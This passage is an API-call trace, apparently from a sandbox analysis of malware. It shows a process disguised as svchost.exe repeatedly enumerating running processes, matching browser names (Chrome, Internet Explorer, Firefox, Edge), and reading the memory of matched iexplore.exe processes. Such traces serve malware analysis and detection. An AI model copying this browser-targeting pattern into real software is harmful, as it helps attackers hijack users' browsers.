	[0202.431] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.432] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0202.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.432] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.432] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0202.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2294
	[0202.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.433] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0202.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.433] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.434] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0202.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.434] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0202.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2298
	[0202.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.435] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0202.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.435] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.436] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0202.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.436] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.437] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0202.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x229c
	[0202.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.438] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0202.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.438] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.438] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0202.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.438] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0202.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x22a0
	[0202.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.439] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0202.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.440] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.440] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0202.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.441] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.441] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0202.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x22a4
	[0202.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.442] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0202.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.442] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.443] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0202.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.443] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0202.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x22a8
	[0202.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.444] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0202.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.445] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.445] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0202.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.445] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.445] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0202.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x22ac
	[0202.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.446] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0202.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.446] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.447] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0202.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.447] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.447] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0202.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x22b0
	[0202.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.448] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0202.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.448] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.449] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0202.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.449] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.449] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0202.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x22b4
	[0202.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.450] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0202.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.451] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.451] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0202.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.452] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.452] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0202.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x22b8
	[0202.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.453] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0202.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.454] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.454] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0202.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.454] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.455] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0202.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x22bc
	[0202.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.456] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0202.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.456] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.457] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0202.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.469] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.470] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0202.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x22c0
	[0202.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.471] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0202.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.471] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.472] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0202.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.472] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.472] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x22c4
	[0202.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.473] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.473] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.474] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.474] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.474] NtQueryInformationProcess (in: ProcessHandle=0x22c4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.474] ReadProcessMemory (in: hProcess=0x22c4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.474] ReadProcessMemory (in: hProcess=0x22c4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.474] ReadProcessMemory (in: hProcess=0x22c4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.474] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.475] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x22c8
	[0202.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.475] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.476] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.476] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.476] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.477] NtQueryInformationProcess (in: ProcessHandle=0x22c8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.477] ReadProcessMemory (in: hProcess=0x22c8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.477] ReadProcessMemory (in: hProcess=0x22c8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.477] ReadProcessMemory (in: hProcess=0x22c8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.477] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.477] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x22cc
	[0202.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.478] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.478] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.478] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.479] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.479] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0202.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x22d0
	[0202.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.480] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0202.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.480] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.480] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0202.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.481] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.481] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x22d4
	[0202.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.482] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.482] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.482] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.483] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.483] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.483] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0202.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x22d8
	[0202.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.484] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.485] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.485] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.485] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.485] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x22dc
	[0202.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.486] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.486] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.487] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.487] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.487] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0202.488] CloseHandle (hObject=0x188) returned 1
	[0202.488] Sleep (dwMilliseconds=0x64) 
	[0202.583] GetCurrentProcessId () returned 0x110
	[0202.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0202.587] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0202.589] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0202.590] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0202.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x22e0
	[0202.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.592] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.593] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.593] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.593] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.594] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x22e4
	[0202.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.594] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.595] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.595] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.595] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
